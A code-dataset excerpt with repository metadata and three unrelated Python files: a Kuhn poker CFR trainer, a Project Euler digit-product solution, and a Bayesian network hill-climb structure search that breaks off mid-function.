2019-12-22T16:16:39.000Z
|
2021-07-07T08:46:35.000Z
|
program/KuhnTrainer.py
|
Artemys24/IAPoker
|
34eee1b2c251ff825f1e36758212b6bb46bb513b
|
[
"MIT"
] | null | null | null |
program/KuhnTrainer.py
|
Artemys24/IAPoker
|
34eee1b2c251ff825f1e36758212b6bb46bb513b
|
[
"MIT"
] | null | null | null |
import random
from typing import *
from KuhnNode import KuhnNode
import pickle, time
from KuhnTest import KuhnTest
NUM_ACTIONS = 2
nodeMap = {}
def continueTrain(file, iterations: int, saveName):
kt = KuhnTest()
kt.read(file)
global nodeMap
nodeMap = kt.nodeMap
train(iterations, saveName)
def continueTrainPrune(file, iterations: int, saveName):
kt = KuhnTest()
kt.read(file)
global nodeMap
nodeMap = kt.nodeMap
trainPrune(iterations, saveName)
def train(iterations: int, saveName):
t1 = time.time()
# We represent cards[0] as player 1 and cards[1] as player 2
cards = [1, 2, 3]
util = 0
for i in range(1, iterations):
# Shuffle Cards. Note that cards are shuffled before call to cfr,
# chance node outcomes are pre-sampled.
# This form of Monte Carlo CFR is called chance-sampling.
random.shuffle(cards)
util += cfr(cards, '', 1, 1)
# Progress
freq_print = 100000
if i % (freq_print) == 0:
if time.time() - t1 != 0.:
print(f"Kuhn trained {i} iterations. {str(freq_print / (time.time() - t1))} iterations per second.")
my = KuhnTest()
my.nodeMap = nodeMap
print("Average game value: " + str(my.gameValue()))
print(f"Worst case game value: {my.exploitability()}")
print(f"Total exploitability: {-sum(my.exploitability())}")
t1 = time.time()
my = KuhnTest()
my.nodeMap = nodeMap
print("Strategy: ")
for node in nodeMap.values():
print(node)
print("Average game value: " + str(my.gameValue()))
# print("Total exploitability: "+ str(sum(my.exploitability()[a] for a in range(2))))
# Save the trained algorithm
with open(saveName, 'wb') as f:
pickle.dump(nodeMap, f)
def trainPrune(iterations: int, savePath):
t1 = time.time()
# We represent cards[0] as player 1 and cards[1] as player 2
cards = [1, 2, 3]
util = 0
for i in range(1, iterations):
# Shuffle Cards. Note that cards are shuffled before call to cfr,
# chance node outcomes are pre-sampled.
# This form of Monte Carlo CFR is called chance-sampling.
random.shuffle(cards)
util += cfrPrune(cards, '', 1, 1)
# Progress
if i % (10 ** 5) == 0:
my = KuhnTest()
my.nodeMap = nodeMap
print(f"Kuhn trained {i} iterations. {str(10 ** 5 / (time.time() - t1))} iterations per second.")
print(f"Total exploitability: {sum(my.exploitability())}")
t1 = time.time()
my = KuhnTest()
my.nodeMap = nodeMap
for node in nodeMap.values():
print(node)
print("Average game value: " + my.gameValue())
# Save the trained algorithm
with open(savePath, 'wb') as f:
pickle.dump(nodeMap, f)
def cfr(cards: List[int], history: str, p0: float, p1: float) -> float:
plays = len(history)
curr_player = plays % 2
infoSet = str(cards[curr_player]) + history
curr_node = KuhnNode()
curr_node.infoSet = infoSet
payoff = curr_node.returnPayoff(cards)
terminalNode = payoff is not None
# Return payoff for terminal states
if terminalNode:
return payoff
# Get information set node or create it if nonexistent
curr_node = nodeMap.get(infoSet)
if curr_node is None:
curr_node = KuhnNode()
curr_node.infoSet = infoSet
nodeMap[infoSet] = curr_node
# For each action, recursively call cfr with additional history and probability
realization_weight = p1 if curr_player == 0 else p0
strategy = curr_node.getStrategy(realization_weight)
util = [0] * NUM_ACTIONS
# nodeUtil is the weighted average of the cfr of each branch,
# weighted by the probability of traversing down a branch
nodeUtil = 0
for a in range(NUM_ACTIONS):
nextHistory = history + ('p' if a == 0 else 'b')
# The first probability is player 1's counterfactual probability
if curr_player == 0:
util[a] = -cfr(cards, nextHistory, p0 * strategy[a], p1)
# Current player is 1
else:
util[a] = -cfr(cards, nextHistory, p0, p1 * strategy[a])
nodeUtil += strategy[a] * util[a]
# For each action, compute and accumulate counterfactual regret
for a in range(NUM_ACTIONS):
regret = util[a] - nodeUtil
curr_node.regretSum[a] += (p1 if curr_player == 0 else p0) * regret
return nodeUtil
def cfrPrune(cards: List[int], history: str, p0: float, p1: float) -> float:
plays = len(history)
curr_player = plays % 2
infoSet = str(cards[curr_player]) + history
curr_node = KuhnNode()
curr_node.infoSet = infoSet
payoff = curr_node.returnPayoff(cards)
terminalNode = payoff is not None
# Return payoff for terminal states
if terminalNode:
return payoff
# Get information set node or create it if nonexistent
curr_node = nodeMap.get(infoSet)
if curr_node is None:
curr_node = KuhnNode()
curr_node.infoSet = infoSet
nodeMap[infoSet] = curr_node
# For each action, recursively call cfr with additional history and probability
realization_weight = p1 if curr_player == 0 else p0
strategy = curr_node.getStrategy(realization_weight)
util = [0] * NUM_ACTIONS
# nodeUtil is the weighted average of the cfr of each branch,
# weighted by the probability of traversing down a branch
nodeUtil = 0
for a in curr_node.promising_branches:
nextHistory = history + ('p' if a == 0 else 'b')
# The first probability is player 1's counterfactual probability
if curr_player == 0:
util[a] = -cfr(cards, nextHistory, p0 * strategy[a], p1)
# Current player is 1
else:
util[a] = -cfr(cards, nextHistory, p0, p1 * strategy[a])
nodeUtil += strategy[a] * util[a]
# For each action, compute and accumulate counterfactual regret
for a in curr_node.promising_branches:
regret = util[a] - nodeUtil
curr_node.regretSum[a] += (p1 if curr_player == 0 else p0) * regret
return nodeUtil
if __name__ == '__main__':
import time
start_time = time.time()
train(10 ** 6, "kt-10")
# continueTrain('kt-30Mp', 170*10**6, 'kt-200M')
print("--- %s seconds ---" % (time.time() - start_time))
| 35.038251
| 116
| 0.628041
| 840
| 6,412
| 4.727381
| 0.185714
| 0.044321
| 0.018131
| 0.019642
| 0.846134
| 0.846134
| 0.794007
| 0.765802
| 0.737849
| 0.737849
| 0
| 0.021295
| 0.267623
| 6,412
| 182
| 117
| 35.230769
| 0.824319
| 0.232065
| 0
| 0.728682
| 0
| 0.015504
| 0.087268
| 0.015124
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.046512
| 0
| 0.124031
| 0.108527
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9e07bace25495bff9be042764f0916662e12d60e
| 2,815
|
py
|
Python
|
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
008.py
|
GeraldHaxhillari/ProjectEuler
|
ccbfa90845fba0e44ec12c1137071a8e538fa502
|
[
"MIT"
] | null | null | null |
"""
Largest product in a series
Problem 8
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
import numpy as np
given_number = list('7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450')
final_product = 0
for i in range(len(given_number) - 13):
current_digits = given_number[i: i+13]
product = np.prod([int(digit) for digit in current_digits])
if product > final_product:
final_product = product
final_digits = current_digits
print('final_digits: ', final_digits)
print('final_product: ', final_product)
"""
final_digits: ['5', '5', '7', '6', '6', '8', '9', '6', '6', '4', '8', '9', '5']
final_product: 23514624000
"""
| 54.134615
| 1,023
| 0.900888
| 147
| 2,815
| 17.163265
| 0.489796
| 0.028537
| 0.022592
| 0.015061
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0.047562
| 0
| 0.775
| 0.062167
| 2,815
| 51
| 1,024
| 55.196078
| 0.179545
| 0.459325
| 0
| 0
| 0
| 0
| 0.736052
| 0.715308
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9e0dd5177df052307f6bf740f7bd6711d62c46a4
| 35,527
|
py
|
Python
|
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | 1
|
2019-10-02T01:03:23.000Z
|
2019-10-02T01:03:23.000Z
|
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | null | null | null |
autopgm/external/HillClimbSearch.py
|
ideo-henry/autopgm
|
31d0f51d20fcfc7f3ff76649a26f492e5b2c40cd
|
[
"MIT"
] | null | null | null |
from itertools import permutations
import networkx as nx
from pgmpy.estimators import StructureEstimator
from autopgm.external.K2Score import K2Score
from pgmpy.models import BayesianModel
import random
from collections import defaultdict
class HillClimbSearch(StructureEstimator):
def __init__(self, data, scoring_method=None, inbound_nodes=[], outbound_nodes=[], known_independencies=[],
n_random_restarts=10, random_restart_length=5, scores=None, index=0, lr_variables=[], **kwargs):
"""
Class for heuristic hill climb searches for BayesianModels, to learn
network structure from data. `estimate` attempts to find a model with optimal score.
Parameters
----------
data: pandas DataFrame object
datafame object where each column represents one variable.
(If some values in the data are missing the data cells should be set to `numpy.NaN`.
Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.)
scoring_method: Instance of a `StructureScore`-subclass (`K2Score` is used as default)
An instance of `K2Score`, `BdeuScore`, or `BicScore`.
This score is optimized during structure estimation by the `estimate`-method.
state_names: dict (optional)
A dict indicating, for each variable, the discrete set of states (or values)
that the variable can take. If unspecified, the observed values in the data set
are taken to be the only possible states.
complete_samples_only: bool (optional, default `True`)
Specifies how to deal with missing data, if present. If set to `True` all rows
that contain `np.Nan` somewhere are ignored. If `False` then, for each variable,
every row where neither the variable nor its parents are `np.NaN` is used.
This sets the behavior of the `state_count`-method.
"""
if scoring_method is not None:
self.scoring_method = scoring_method
else:
self.scoring_method = K2Score(data, **kwargs)
self.inbound_nodes = inbound_nodes
self.outbound_nodes = outbound_nodes
self.known_independencies = known_independencies
self.n_random_restarts = n_random_restarts
self.random_restart_length = random_restart_length
self.scores = scores
self.index = index
self.lr_variables = lr_variables
self.lr_learnable = []
super(HillClimbSearch, self).__init__(data, **kwargs)
def _legal_operations(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
local_score = self.scoring_method.local_score
nodes = self.state_names.keys()
# inbound nodes: outbound edges of prohibited
prohibited_outbound_edges = set()
for node in self.inbound_nodes:
prohibited_outbound_edges.update([(node, X) for X in nodes])
# outbound nodes: inbound edges of prohibited
prohibited_inbound_edges = set()
for node in self.outbound_nodes:
prohibited_inbound_edges.update([(X, node) for X in nodes])
potential_new_edges = (set(permutations(nodes, 2)) -
set(model.edges()) -
set([(Y, X) for (X, Y) in model.edges()]) -
set(self.known_independencies) -
prohibited_outbound_edges -
prohibited_inbound_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
# score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_delta = self.get_local_score(Y, new_parents) - self.get_local_score(Y, old_parents)
yield (operation, score_delta)
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
# score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_delta = self.get_local_score(Y, new_parents) - self.get_local_score(Y, old_parents)
yield (operation, score_delta)
for (X, Y) in model.edges(): # (3) flip single edge
if (Y, X) not in prohibited_inbound_edges and (Y, X) not in prohibited_outbound_edges:
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
# score_delta = (local_score(X, new_X_parents) +
# local_score(Y, new_Y_parents) -
# local_score(X, old_X_parents) -
# local_score(Y, old_Y_parents))
score_delta = (self.get_local_score(X, new_X_parents) +
self.get_local_score(Y, new_Y_parents) -
self.get_local_score(X, old_X_parents) -
self.get_local_score(Y, old_Y_parents))
yield (operation, score_delta)
def _legal_operations_without_score(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
nodes = self.state_names.keys()
# inbound nodes: outbound edges of prohibited
prohibited_outbound_edges = set()
for node in self.inbound_nodes:
prohibited_outbound_edges.update([(node, X) for X in nodes])
# outbound nodes: inbound edges of prohibited
prohibited_inbound_edges = set()
for node in self.outbound_nodes:
prohibited_inbound_edges.update([(X, node) for X in nodes])
potential_new_edges = (set(permutations(nodes, 2)) -
set(model.edges()) -
set([(Y, X) for (X, Y) in model.edges()]) -
set(self.known_independencies) -
prohibited_outbound_edges -
prohibited_inbound_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
yield operation
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
yield operation
for (X, Y) in model.edges(): # (3) flip single edge
if (Y, X) not in prohibited_inbound_edges and (Y, X) not in prohibited_outbound_edges:
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
yield operation
def estimate(self, start=None, tabu_list=[], tabu_length=0, max_indegree=None):
"""
Performs local hill climb search to estimates the `BayesianModel` structure
that has optimal score, according to the scoring method supplied in the constructor.
Starts at model `start` and proceeds by step-by-step network modifications
until a local maximum is reached. Only estimates network structure, no parametrization.
Parameters
----------
start: BayesianModel instance
The starting point for the local search. By default a completely disconnected network is used.
tabu_list: list[operations]
tabu_length: int
If provided, the last `tabu_length` graph modifications cannot be reversed
during the search procedure. This serves to enforce a wider exploration
of the search space. Default value: 100.
max_indegree: int or None
If provided and unequal None, the procedure only searches among models
where all nodes have at most `max_indegree` parents. Defaults to None.
Returns
-------
model: `BayesianModel` instance
A `BayesianModel` at a (local) score maximum.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import HillClimbSearch, BicScore
>>> # create data sample with 9 random variables:
... data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 9)), columns=list('ABCDEFGHI'))
>>> # add 10th dependent variable
... data['J'] = data['A'] * data['B']
>>> est = HillClimbSearch(data, scoring_method=BicScore(data))
>>> best_model = est.estimate()
>>> sorted(best_model.nodes())
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']
>>> best_model.edges()
[('B', 'J'), ('A', 'J')]
>>> # search a model with restriction on the number of parents:
>>> est.estimate(max_indegree=1).edges()
[('J', 'A'), ('B', 'J')]
"""
epsilon = 1e-8
nodes = self.state_names.keys()
if start is None:
start = BayesianModel()
start.add_nodes_from(nodes)
elif not isinstance(start, BayesianModel) or not set(start.nodes()) == set(nodes):
raise ValueError("'start' should be a BayesianModel with the same variables as the data set, or 'None'.")
current_model = start
while True:
best_score_delta = 0
best_operation = None
for operation, score_delta in self._legal_operations(current_model, tabu_list, max_indegree):
if score_delta > best_score_delta:
best_operation = operation
best_score_delta = score_delta
print(best_operation)
print(best_score_delta)
if best_operation is None or best_score_delta < epsilon:
break
elif best_operation[0] == '+':
current_model.add_edge(*best_operation[1])
tabu_list = ([('-', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == '-':
current_model.remove_edge(*best_operation[1])
tabu_list = ([('+', best_operation[1])] + tabu_list)[:tabu_length]
elif best_operation[0] == 'flip':
X, Y = best_operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([best_operation] + tabu_list)[:tabu_length]
if len(self.lr_variables) > 0:
self.lr_learnable.append(self.is_lr_learnable(current_model))
return current_model
def random_restart(self, start=None, tabu_length=0, max_indegree=None):
# starting best model
if not start:
best_model = self.estimate(tabu_length=tabu_length, max_indegree=max_indegree)
else:
best_model = start
best_score = K2Score(self.data).score(best_model)
# iterate random restarts
for i in range(self.n_random_restarts):
current_model = best_model.copy()
n_moves = self.calculate_random_restart_length(i)
tabu_list = []
# perform random actions
for j in range(n_moves):
operations = []
for operation in self._legal_operations_without_score(current_model, tabu_list, max_indegree):
operations.append(operation)
try:
operation = random.choice(operations)
except IndexError:
continue
# perform operation
if operation[0] == '+':
current_model.add_edge(*operation[1])
tabu_list = ([('-', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == '-':
current_model.remove_edge(*operation[1])
tabu_list = ([('+', operation[1])] + tabu_list)[:tabu_length]
elif operation[0] == 'flip':
X, Y = operation[1]
current_model.remove_edge(X, Y)
current_model.add_edge(Y, X)
tabu_list = ([operation] + tabu_list)[:tabu_length]
# hill climb
print('----- hill climbing -----')
current_model = self.estimate(start=current_model, tabu_list=tabu_list,
tabu_length=tabu_length, max_indegree=max_indegree)
current_score = K2Score(self.data).score(current_model)
# compare with the best model
if current_score > best_score:
best_model = current_model
best_score = current_score
if len(self.lr_variables) > 0:
self.lr_learnable.append(self.is_lr_learnable(current_model))
return best_model.copy()
def calculate_random_restart_length(self, i):
return int(self.random_restart_length + i)
def get_local_score(self, node, parents):
local_score = self.scoring_method.local_score
key = tuple([node, tuple(sorted(parents))])
# get score from cache
if key in self.scores[self.index].keys():
return self.scores[self.index][key]
# cache result for later use
else:
score = local_score(node, parents)
self.scores[self.index][key] = score
return score
def is_lr_learnable(self, model):
variable2lr = defaultdict(set)
for i, lr in enumerate(self.lr_variables):
for variable in lr:
variable2lr[variable].add(i)
# cross local-relation edges
for start, end in model.edges:
if variable2lr[start] & variable2lr[end] == set():
return False
# inbound edges from multiple tables
inbound = defaultdict(set)
for start, end in model.edges:
inbound[end] |= (variable2lr[start] & variable2lr[end])
if len(inbound[end]) > 1:
return False
return True
class GlobalHillClimbSearch(object):
def __init__(self, parser, n_random_restarts=10, random_restart_length=5):
"""
Class for heuristic hill climb searches for BayesianModels, to learn
network structure from data. `estimate` attempts to find a model with optimal score.
Parameters
----------
parser: MultipleFileParser
"""
self.parser = parser
self.scoring_methods = []
for single_parser in self.parser.single_file_parsers:
self.scoring_methods.append(K2Score(single_parser.data_frame))
# variable -> data source mapping
self.variable_source_mapping = {}
for i in range(len(self.parser.single_file_parsers)):
parser = self.parser.single_file_parsers[i]
for var in parser.variables:
if var not in self.variable_source_mapping.keys():
self.variable_source_mapping[var] = {i}
else:
self.variable_source_mapping[var].add(i)
# random restart parameters
self.n_random_restarts = n_random_restarts
self.random_restart_length = random_restart_length
# record training KL curve
self.structure_history = []
def _legal_operations(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
prohibited_edges = self.outbound_constraints(model)
potential_new_edges = set()
edge_map = {}
for i in range(len(self.parser.single_file_parsers)):
local_nodes = self.parser.single_file_parsers[i].variables
potential_new_local_edges = (set(permutations(local_nodes, 2)) -
set([(X, Y) for (X, Y) in model.edges()]) -
set([(Y, X) for (X, Y) in model.edges()]) -
prohibited_edges)
# store which data source the edge resides in
for edge in potential_new_local_edges:
if edge in edge_map.keys():
edge_map[edge].append(i)
else:
edge_map[edge] = [i]
potential_new_edges.update(potential_new_local_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
score_deltas = []
for index in edge_map[(X, Y)]:
nodes = set(old_parents + new_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
score_deltas = []
for index in self.data_source(X, Y):
nodes = set(old_parents + new_parents + [X, Y])
if len(list(
filter(lambda x: x not in self.parser.single_file_parsers[index].variables, nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = local_score(Y, new_parents) - local_score(Y, old_parents)
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
for (X, Y) in model.edges(): # (3) flip single edge
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)) and (Y, X) not in prohibited_edges:
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
score_deltas = []
for index in self.data_source(X, Y):
nodes = set(old_X_parents + new_X_parents + old_Y_parents + new_Y_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
local_score = self.scoring_methods[index].local_score
score_delta = (local_score(X, new_X_parents) +
local_score(Y, new_Y_parents) -
local_score(X, old_X_parents) -
local_score(Y, old_Y_parents))
score_deltas.append(score_delta)
if len(score_deltas) > 0:
yield (operation, sum(score_deltas) / len(score_deltas))
def _legal_operations_without_score(self, model, tabu_list=[], max_indegree=None):
"""Generates a list of legal (= not in tabu_list) graph modifications
for a given model, together with their score changes. Possible graph modifications:
(1) add, (2) remove, or (3) flip a single edge. For details on scoring
see Koller & Fridman, Probabilistic Graphical Models, Section 18.4.3.3 (page 818).
If a number `max_indegree` is provided, only modifications that keep the number
of parents for each node below `max_indegree` are considered."""
prohibited_edges = self.outbound_constraints(model)
potential_new_edges = set()
edge_map = {}
for i in range(len(self.parser.single_file_parsers)):
local_nodes = self.parser.single_file_parsers[i].variables
potential_new_local_edges = (set(permutations(local_nodes, 2)) -
set([(X, Y) for (X, Y) in model.edges()]) -
set([(Y, X) for (X, Y) in model.edges()]) -
prohibited_edges)
# store which data source the edge resides in
for edge in potential_new_local_edges:
if edge in edge_map.keys():
edge_map[edge].append(i)
else:
edge_map[edge] = [i]
potential_new_edges.update(potential_new_local_edges)
for (X, Y) in potential_new_edges: # (1) add single edge
if nx.is_directed_acyclic_graph(nx.DiGraph(list(model.edges()) + [(X, Y)])):
operation = ('+', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents + [X]
if max_indegree is None or len(new_parents) <= max_indegree:
valid_count = 0
for index in edge_map[(X, Y)]:
nodes = set(old_parents + new_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
for (X, Y) in model.edges(): # (2) remove single edge
operation = ('-', (X, Y))
if operation not in tabu_list:
old_parents = list(model.get_parents(Y))
new_parents = old_parents[:]
new_parents.remove(X)
valid_count = 0
for index in self.data_source(X, Y):
nodes = set(old_parents + new_parents + [X, Y])
if len(list(
filter(lambda x: x not in self.parser.single_file_parsers[index].variables, nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
for (X, Y) in model.edges(): # (3) flip single edge
new_edges = list(model.edges()) + [(Y, X)]
new_edges.remove((X, Y))
if nx.is_directed_acyclic_graph(nx.DiGraph(new_edges)):
operation = ('flip', (X, Y))
if operation not in tabu_list and ('flip', (Y, X)) not in tabu_list and (Y, X) not in prohibited_edges:
old_X_parents = list(model.get_parents(X))
old_Y_parents = list(model.get_parents(Y))
new_X_parents = old_X_parents + [Y]
new_Y_parents = old_Y_parents[:]
new_Y_parents.remove(X)
if max_indegree is None or len(new_X_parents) <= max_indegree:
valid_count = 0
for index in self.data_source(X, Y):
nodes = set(old_X_parents + new_X_parents + old_Y_parents + new_Y_parents + [X, Y])
if len(list(filter(lambda x: x not in self.parser.single_file_parsers[index].variables,
nodes))) > 0:
continue
valid_count += 1
if valid_count > 0:
yield operation
def outbound_constraints(self, model):
prohibited_edges = set()
for (X, Y) in list(model.edges):
if Y in self.parser.shared_variables:
constrained_sources = self.variable_source_mapping[Y] - self.data_source(X, Y)
for i in constrained_sources:
for var in self.parser.single_file_parsers[i].variables:
prohibited_edges.add((var, Y))
return prohibited_edges
def data_source(self, X, Y):
"""
Finds the common data source between X and Y
:param X:
:param Y:
:return: a list of indices
"""
return self.variable_source_mapping[X].intersection(self.variable_source_mapping[Y])
def estimate(self, start=None, tabu_list=[], tabu_length=0, max_indegree=None):
"""
Performs local hill climb search to estimates the `BayesianModel` structure
that has optimal score, according to the scoring method supplied in the constructor.
Starts at model `start` and proceeds by step-by-step network modifications
until a local maximum is reached. Only estimates network structure, no parametrization.
Parameters
----------
start: BayesianModel instance
The starting point for the local search. By default a completely disconnected network is used.
tabu_list: list
tabu_length: int
If provided, the last `tabu_length` graph modifications cannot be reversed
during the search procedure. This serves to enforce a wider exploration
of the search space. Default value: 100.
max_indegree: int or None
If provided and unequal None, the procedure only searches among models
where all nodes have at most `max_indegree` parents. Defaults to None.
Returns
-------
model: `BayesianModel` instance
A `BayesianModel` at a (local) score maximum.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import HillClimbSearch, BicScore
>>> # create data sample with 9 random variables:
... data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 9)), columns=list('ABCDEFGHI'))
>>> # add 10th dependent variable
... data['J'] = data['A'] * data['B']
>>> est = HillClimbSearch(data, scoring_method=BicScore(data))
>>> best_model = est.estimate()
>>> sorted(best_model.nodes())
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']
>>> best_model.edges()
[('B', 'J'), ('A', 'J')]
>>> # search a model with restriction on the number of parents:
>>> est.estimate(max_indegree=1).edges()
[('J', 'A'), ('B', 'J')]
"""
epsilon = 1e-8
nodes = self.parser.relevant_variables
if start is None:
start = BayesianModel()
start.add_nodes_from(nodes)
elif not isinstance(start, BayesianModel) or not set(start.nodes()) == set(nodes):
raise ValueError("'start' should be a BayesianModel with the same variables as the data set, or 'None'.")
current_model = start
while True:
